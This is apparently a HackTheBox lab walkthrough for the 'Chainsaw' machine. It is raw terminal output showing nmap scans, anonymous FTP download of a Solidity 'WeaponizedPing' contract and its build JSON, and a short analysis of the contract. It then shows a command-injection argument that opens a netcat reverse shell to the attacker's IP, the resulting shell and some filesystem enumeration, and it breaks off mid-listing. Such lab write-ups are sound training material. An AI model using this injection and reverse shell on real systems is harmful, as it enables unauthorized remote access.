Chainsaw – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.142
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 10:53 GMT
Nmap scan report for 10.10.10.142
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r–r– 1 1001 1001 23828 Dec 05 2018 WeaponizedPing.json
| -rw-r–r– 1 1001 1001 243 Dec 12 2018 WeaponizedPing.sol
|_-rw-r–r– 1 1001 1001 44 Nov 24 06:02 address.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.15.187
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:dd:8a:5d:3c:78:d4:41:ff:bb:27:39:c1:a2:4f:eb (RSA)
| 256 3d:71:ff:d7:29:d5:d4:b2:a6:4f:9d:eb:91:1b:70:9f (ECDSA)
|_ 256 7e:02:da:db:29:f9:d2:04:63:df:fc:91:fd:a2:5a:f2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/24%OT=21%CT=1%CU=33778%PV=Y%DS=2%DC=T%G=Y%TM=5DDA61
OS:42%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 215.76 ms 10.10.14.1
2 215.82 ms 10.10.10.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds

root@kali:~/Downloads# ftp 10.10.10.142
Connected to 10.10.10.142.
220 (vsFTPd 3.0.3)
Name (10.10.10.142:root): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 1001 1001 23828 Dec 05 2018 WeaponizedPing.json
-rw-r–r– 1 1001 1001 243 Dec 12 2018 WeaponizedPing.sol
-rw-r–r– 1 1001 1001 44 Nov 24 06:02 address.txt
226 Directory send OK.
ftp> mget *
mget WeaponizedPing.json? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for WeaponizedPing.json (23828 bytes).
226 Transfer complete.
23828 bytes received in 0.21 secs (109.9201 kB/s)
mget WeaponizedPing.sol? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for WeaponizedPing.sol (243 bytes).
226 Transfer complete.
243 bytes received in 0.00 secs (4.6349 MB/s)
mget address.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for address.txt (44 bytes).
226 Transfer complete.
44 bytes received in 0.00 secs (452.3026 kB/s)
ftp> exit
221 Goodbye.

root@kali:~/Downloads# cat WeaponizedPing.sol
pragma solidity ^0.4.24;

contract WeaponizedPing
{
string store = “google.com”;

function getDomain() public view returns (string)
{
return store;
}

function setDomain(string _value) public
{
store = _value;
}
}

root@kali:~/Downloads# cat WeaponizedPing.json
{
“contractName”: “WeaponizedPing”,
“abi”: [
{
“constant”: true,
“inputs”: [],
“name”: “getDomain”,
“outputs”: [
{
“name”: “”,
“type”: “string”
}
],
“payable”: false,
“stateMutability”: “view”,
“type”: “function”
},
{
“constant”: false,
“inputs”: [
{
“name”: “_value”,
“type”: “string”
}
],
“name”: “setDomain”,
“outputs”: [],
“payable”: false,
“stateMutability”: “nonpayable”,
“type”: “function”
}
],
“bytecode”: “0x60806040526040805190810160405280600a81526020017f676f6f676c652e636f6d000000000000000000000000000000000000000000008152506000908051906020019061004f929190610062565b5034801561005c57600080fd5b50610107565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106100a357805160ff19168380011785556100d1565b828001600101855582156100d1579182015b828111156100d05782518255916020019190600101906100b5565b5b5090506100de91906100e2565b5090565b61010491905b808211156101005760008160009055506001016100e8565b5090565b90565b6102d7806101166000396000f30060806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063b68d180914610051578063e5eab096146100e1575b600080fd5b34801561005d57600080fd5b5061006661014a565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156100a657808201518184015260208101905061008b565b50505050905090810190601f1680156100d35780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156100ed57600080fd5b50610148600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506101ec565b005b606060008054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156101e25780601f106101b7576101008083540402835291602001916101e2565b820191906000526020600020905b8154815290600101906020018083116101c557829003601f168201915b5050505050905090565b8060009080519060200190610202929190610206565b5050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061024757805160ff1916838001178555610275565b82800160010185558215610275579182015b82811115610274578251825591602001919060010190610259565b5b5090506102829190610286565b5090565b6102a891905b808211156102a457600081600090555060010161028c565b5090565b905600a165627a7a72305820d5d4d99bdb5542d8d65ef822d8a98c80911c2c3f15d609d10003ccf4227858660029”,
“deployedBytecode”: “0x60806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063b68d180914610051578063e5eab096146100e1575b600080fd5b34801561005d57600080fd5b5061006661014a565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156100a657808201518184015260208101905061008b565b50505050905090810190601f1680156100d35780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156100ed57600080fd5b50610148600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506101ec565b005b606060008054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156101e25780601f106101b7576101008083540402835291602001916101e2565b820191906000526020600020905b8154815290600101906020018083116101c557829003601f168201915b5050505050905090565b8060009080519060200190610202929190610206565b5050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061024757805160ff1916838001178555610275565b82800160010185558215610275579182015b82811115610274578251825591602001919060010190610259565b5b5090506102829190610286565b5090565b6102a891905b808211156102a457600081600090555060010161028c565b5090565b905600a165627a7a72305820d5d4d99bdb5542d8d65ef822d8a98c80911c2c3f15d609d10003ccf4227858660029”,
“sourceMap”: “27:210:1:-;;;56:27;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;27:210;8:9:-1;5:2;;;30:1;27;20:12;5:2;27:210:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;:::o;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;:::-;;;;;;;”,
“deployedSourceMap”: “27:210:1:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;;8:9:-1;5:2;;;30:1;27;20:12;5:2;88:75:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;88:75:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;166:68;;8:9:-1;5:2;;;30:1;27;20:12;5:2;166:68:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;130:6;153:5;146:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;:::o;166:68::-;223:6;215:5;:14;;;;;;;;;;;;:::i;:::-;;166:68;:::o;27:210::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;:::o;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o”,
“source”: “pragma solidity ^0.4.24;\n\n\ncontract WeaponizedPing {\n\n string store = \”google.com\”;\n\n function getDomain() public view returns (string) {\n return store;\n }\n function setDomain(string _value) public {\n store = _value;\n }\n\n}\n\n”,
“sourcePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“ast”: {
“absolutePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“exportedSymbols”: {
“WeaponizedPing”: [
80
]
},
“id”: 81,
“nodeType”: “SourceUnit”,
“nodes”: [
{
“id”: 58,
“literals”: [
“solidity”,
“^”,
“0.4”,
“.24”
],
“nodeType”: “PragmaDirective”,
“src”: “0:24:1”
},
{
“baseContracts”: [],
“contractDependencies”: [],
“contractKind”: “contract”,
“documentation”: null,
“fullyImplemented”: true,
“id”: 80,
“linearizedBaseContracts”: [
80
],
“name”: “WeaponizedPing”,
“nodeType”: “ContractDefinition”,
“nodes”: [
{
“constant”: false,
“id”: 61,
“name”: “store”,
“nodeType”: “VariableDeclaration”,
“scope”: 80,
“src”: “56:27:1”,
“stateVariable”: true,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string”
},
“typeName”: {
“id”: 59,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “56:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: {
“argumentTypes”: null,
“hexValue”: “676f6f676c652e636f6d”,
“id”: 60,
“isConstant”: false,
“isLValue”: false,
“isPure”: true,
“kind”: “string”,
“lValueRequested”: false,
“nodeType”: “Literal”,
“src”: “71:12:1”,
“subdenomination”: null,
“typeDescriptions”: {
“typeIdentifier”: “t_stringliteral_fda446403d30f2bb15bf0f6e6a453eb8c51242c96883275950401463830444fd”,
“typeString”: “literal_string \”google.com\””
},
“value”: “google.com”
},
“visibility”: “internal”
},
{
“body”: {
“id”: 68,
“nodeType”: “Block”,
“src”: “138:25:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 66,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “153:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“functionReturnParameters”: 65,
“id”: 67,
“nodeType”: “Return”,
“src”: “146:12:1”
}
]
},
“documentation”: null,
“id”: 69,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: true,
“modifiers”: [],
“name”: “getDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 62,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “106:2:1”
},
“payable”: false,
“returnParameters”: {
“id”: 65,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 64,
“name”: “”,
“nodeType”: “VariableDeclaration”,
“scope”: 69,
“src”: “130:6:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 63,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “130:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “129:8:1”
},
“scope”: 80,
“src”: “88:75:1”,
“stateMutability”: “view”,
“superFunction”: null,
“visibility”: “public”
},
{
“body”: {
“id”: 78,
“nodeType”: “Block”,
“src”: “207:27:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 76,
“isConstant”: false,
“isLValue”: false,
“isPure”: false,
“lValueRequested”: false,
“leftHandSide”: {
“argumentTypes”: null,
“id”: 74,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “215:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“nodeType”: “Assignment”,
“operator”: “=”,
“rightHandSide”: {
“argumentTypes”: null,
“id”: 75,
“name”: “_value”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 71,
“src”: “223:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string memory”
}
},
“src”: “215:14:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“id”: 77,
“nodeType”: “ExpressionStatement”,
“src”: “215:14:1”
}
]
},
“documentation”: null,
“id”: 79,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: false,
“modifiers”: [],
“name”: “setDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 72,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 71,
“name”: “_value”,
“nodeType”: “VariableDeclaration”,
“scope”: 79,
“src”: “185:13:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 70,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “185:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “184:15:1”
},
“payable”: false,
“returnParameters”: {
“id”: 73,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “207:0:1”
},
“scope”: 80,
“src”: “166:68:1”,
“stateMutability”: “nonpayable”,
“superFunction”: null,
“visibility”: “public”
}
],
“scope”: 81,
“src”: “27:210:1”
}
],
“src”: “0:239:1”
},
“legacyAST”: {
“absolutePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“exportedSymbols”: {
“WeaponizedPing”: [
80
]
},
“id”: 81,
“nodeType”: “SourceUnit”,
“nodes”: [
{
“id”: 58,
“literals”: [
“solidity”,
“^”,
“0.4”,
“.24”
],
“nodeType”: “PragmaDirective”,
“src”: “0:24:1”
},
{
“baseContracts”: [],
“contractDependencies”: [],
“contractKind”: “contract”,
“documentation”: null,
“fullyImplemented”: true,
“id”: 80,
“linearizedBaseContracts”: [
80
],
“name”: “WeaponizedPing”,
“nodeType”: “ContractDefinition”,
“nodes”: [
{
“constant”: false,
“id”: 61,
“name”: “store”,
“nodeType”: “VariableDeclaration”,
“scope”: 80,
“src”: “56:27:1”,
“stateVariable”: true,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string”
},
“typeName”: {
“id”: 59,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “56:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: {
“argumentTypes”: null,
“hexValue”: “676f6f676c652e636f6d”,
“id”: 60,
“isConstant”: false,
“isLValue”: false,
“isPure”: true,
“kind”: “string”,
“lValueRequested”: false,
“nodeType”: “Literal”,
“src”: “71:12:1”,
“subdenomination”: null,
“typeDescriptions”: {
“typeIdentifier”: “t_stringliteral_fda446403d30f2bb15bf0f6e6a453eb8c51242c96883275950401463830444fd”,
“typeString”: “literal_string \”google.com\””
},
“value”: “google.com”
},
“visibility”: “internal”
},
{
“body”: {
“id”: 68,
“nodeType”: “Block”,
“src”: “138:25:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 66,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “153:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“functionReturnParameters”: 65,
“id”: 67,
“nodeType”: “Return”,
“src”: “146:12:1”
}
]
},
“documentation”: null,
“id”: 69,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: true,
“modifiers”: [],
“name”: “getDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 62,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “106:2:1”
},
“payable”: false,
“returnParameters”: {
“id”: 65,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 64,
“name”: “”,
“nodeType”: “VariableDeclaration”,
“scope”: 69,
“src”: “130:6:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 63,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “130:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “129:8:1”
},
“scope”: 80,
“src”: “88:75:1”,
“stateMutability”: “view”,
“superFunction”: null,
“visibility”: “public”
},
{
“body”: {
“id”: 78,
“nodeType”: “Block”,
“src”: “207:27:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 76,
“isConstant”: false,
“isLValue”: false,
“isPure”: false,
“lValueRequested”: false,
“leftHandSide”: {
“argumentTypes”: null,
“id”: 74,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “215:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“nodeType”: “Assignment”,
“operator”: “=”,
“rightHandSide”: {
“argumentTypes”: null,
“id”: 75,
“name”: “_value”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 71,
“src”: “223:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string memory”
}
},
“src”: “215:14:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“id”: 77,
“nodeType”: “ExpressionStatement”,
“src”: “215:14:1”
}
]
},
“documentation”: null,
“id”: 79,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: false,
“modifiers”: [],
“name”: “setDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 72,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 71,
“name”: “_value”,
“nodeType”: “VariableDeclaration”,
“scope”: 79,
“src”: “185:13:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 70,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “185:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “184:15:1”
},
“payable”: false,
“returnParameters”: {
“id”: 73,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “207:0:1”
},
“scope”: 80,
“src”: “166:68:1”,
“stateMutability”: “nonpayable”,
“superFunction”: null,
“visibility”: “public”
}
],
“scope”: 81,
“src”: “27:210:1”
}
],
“src”: “0:239:1”
},
“compiler”: {
“name”: “solc”,
“version”: “0.4.24+commit.e67f0147.Emscripten.clang”
},
“networks”: {
“1543936419890”: {
“events”: {},
“links”: {},
“address”: “0xaf6ce61d342b48cc992820a154fe0f533e5e487c”,
“transactionHash”: “0x5e94c662f1048fca58c07e16506f1636391f757b07c1b6bb6fbb4380769e99e1”
}
},
“schemaVersion”: “2.0.1”,
“updatedAt”: “2018-12-04T15:24:57.205Z”
}

root@kali:~/Downloads# cat address.txt
0xe3BA3Bd84Eb7bBa32E82e2E58e97226b04D86700

WeaponizedPing: Analysis

WeaponizedPing is a smart contract. smart contracts are written in a language called solidity.
The contract has a variable called store which holds the value google.com by default:

string store = “google.com”;

There are two functions, getDomain() which returns the value of store:

function getDomain() public view returns (string)
{
return store;
}

And setDomain() which takes a string and changes the value of store from whatever it was to that string:

function setDomain(string _value) public
{
store = _value;
}

root@kali:~/Downloads# nmap -p- -T5 10.10.10.142 –max-retries 1 -o nmapfull
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 11:11 GMT
Warning: 10.10.10.142 giving up on port because retransmission cap hit (1).
Stats: 0:02:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.85% done; ETC: 11:17 (0:03:18 remaining)
Stats: 0:03:31 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.02% done; ETC: 11:17 (0:01:54 remaining)
Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.28% done; ETC: 11:17 (0:00:32 remaining)
Nmap scan report for 10.10.10.142
Host is up (0.22s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
9810/tcp open unknown
13286/tcp filtered unknown
17699/tcp filtered unknown
36684/tcp filtered unknown
40389/tcp filtered unknown
42237/tcp filtered unknown
44814/tcp filtered unknown
45070/tcp filtered unknown
64501/tcp filtered unknown
65112/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 357.10 seconds

root@kali:~/Downloads# nmap -p 9810 -sV -sT -sC -o nmap9810 10.10.10.142
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 11:18 GMT
Nmap scan report for 10.10.10.142
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
9810/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:16 GMT
| Connection: close
| Request
| GetRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:08 GMT
| Connection: close
| Request
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:10 GMT
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9810-TCP:V=7.80%I=7%D=11/24%Time=5DDA672F%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,118,”HTTP/1\.1\x20400\x20Bad\x20Request\r\nAccess-Control-All
SF:ow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Type,\x20Accept,
SF:\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nAccess-Control-
SF:Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2
SF:024\x20Nov\x202019\x2011:20:08\x20GMT\r\nConnection:\x20close\r\n\r\n40
SF:0\x20Bad\x20Request”)%r(HTTPOptions,100,”HTTP/1\.1\x20200\x20OK\r\nAcce
SF:ss-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Ty
SF:pe,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nA
SF:ccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDa
SF:te:\x20Sun,\x2024\x20Nov\x202019\x2011:20:10\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n”)%r(FourOhFourRequest,118,”HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nAccess-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x2
SF:0Content-Type,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:
SF:\x20\*\r\nAccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/
SF:plain\r\nDate:\x20Sun,\x2024\x20Nov\x202019\x2011:20:16\x20GMT\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request”);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.21 seconds

root@kali:~/Downloads# gedit weapon.py
root@kali:~/Downloads# chmod +x weapon.py
root@kali:~/Downloads# ./weapon.py ‘; nc 10.10.15.187 1234 -e /bin/bash’

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.142.
Ncat: Connection from 10.10.10.142:35952.

id
uid=1001(administrator) gid=1001(administrator) groups=1001(administrator)

python -c ‘import pty;pty.spawn(“/bin/bash”)’
administrator@chainsaw:/opt/WeaponizedPing$

administrator@chainsaw:/opt/WeaponizedPing$ ls -la
ls -la
total 24
drwxr-xr-x 4 administrator administrator 4096 Jan 23 2019 .
drwxr-xr-x 3 root root 4096 Dec 5 2018 ..
-rwxr-xr-x 1 administrator administrator 2106 Jan 22 2019 main.py
drwxr-xr-x 2 administrator administrator 4096 Dec 13 2018 __pycache__
-rwxr-xr-x 1 administrator administrator 379 Dec 13 2018 runganache.py
drwxr-xr-x 2 administrator administrator 4096 Nov 24 06:01 shared
administrator@chainsaw:/opt/WeaponizedPing$ cd /home
cd /home
administrator@chainsaw:/home$ ls -lrt
ls -lrt
total 8
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 administrator
drwxr-x— 9 bobby bobby 4096 Nov 24 06:44 bobby
administrator@chainsaw:/home$ cd maintain/pub
cd maintain/pub
bash: cd: maintain/pub: No such file or directory
administrator@chainsaw:/home$ cd bobby
cd bobby
bash: cd: bobby: Permission denied
administrator@chainsaw:/home$ cd ..
cd ..
administrator@chainsaw:/$ ls -lrt
ls -lrt
total 2097252
drwxr-xr-x 2 root root 4096 Oct 17 2018 mnt
drwxr-xr-x 2 root root 4096 Oct 17 2018 media
drwxr-xr-x 2 root root 4096 Oct 17 2018 lib64
drwxr-xr-x 13 root root 4096 Oct 17 2018 var
drwx—— 2 root root 16384 Nov 30 2018 lost+found
-rw——- 1 root root 2147483648 Nov 30 2018 swap.img
drwxr-xr-x 2 root root 4096 Nov 30 2018 lib32
drwxr-xr-x 12 root root 4096 Nov 30 2018 usr
drwxr-xr-x 2 root root 4096 Nov 30 2018 libx32
drwxr-xr-x 3 root root 4096 Dec 5 2018 opt
drwxr-xr-x 3 root root 4096 Dec 8 2018 srv
drwxr-xr-x 4 root root 4096 Dec 12 2018 home
drwxr-xr-x 6 root root 4096 Dec 12 2018 snap
lrwxrwxrwx 1 root root 30 Dec 20 2018 vmlinuz.old -> boot/vmlinuz-4.18.0-12-generic
lrwxrwxrwx 1 root root 30 Dec 20 2018 vmlinuz -> boot/vmlinuz-4.18.0-13-generic
lrwxrwxrwx 1 root root 33 Dec 20 2018 initrd.img.old -> boot/initrd.img-4.18.0-12-generic
lrwxrwxrwx 1 root root 33 Dec 20 2018 initrd.img -> boot/initrd.img-4.18.0-13-generic
drwxr-xr-x 3 root root 4096 Jan 12 2019 boot
drwxr-xr-x 2 root root 4096 Jan 12 2019 bin
drwxr-xr-x 22 root root 4096 May 30 14:49 lib
drwxr-xr-x 2 root root 12288 May 30 14:49 sbin
drwxr-xr-x 95 root root 4096 May 30 14:49 etc
drwx—— 10 root root 4096 May 30 15:15 root
dr-xr-xr-x 177 root root 0 Nov 24 06:00 proc
dr-xr-xr-x 13 root root 0 Nov 24 06:00 sys
drwxr-xr-x 18 root root 3920 Nov 24 06:01 dev
drwxr-xr-x 27 root root 940 Nov 24 06:39 run
drwxrwxrwt 13 root root 4096 Nov 24 06:47 tmp

administrator@chainsaw:/$ cd /home
cd /home
administrator@chainsaw:/home$ ls -lrt
ls -lrt
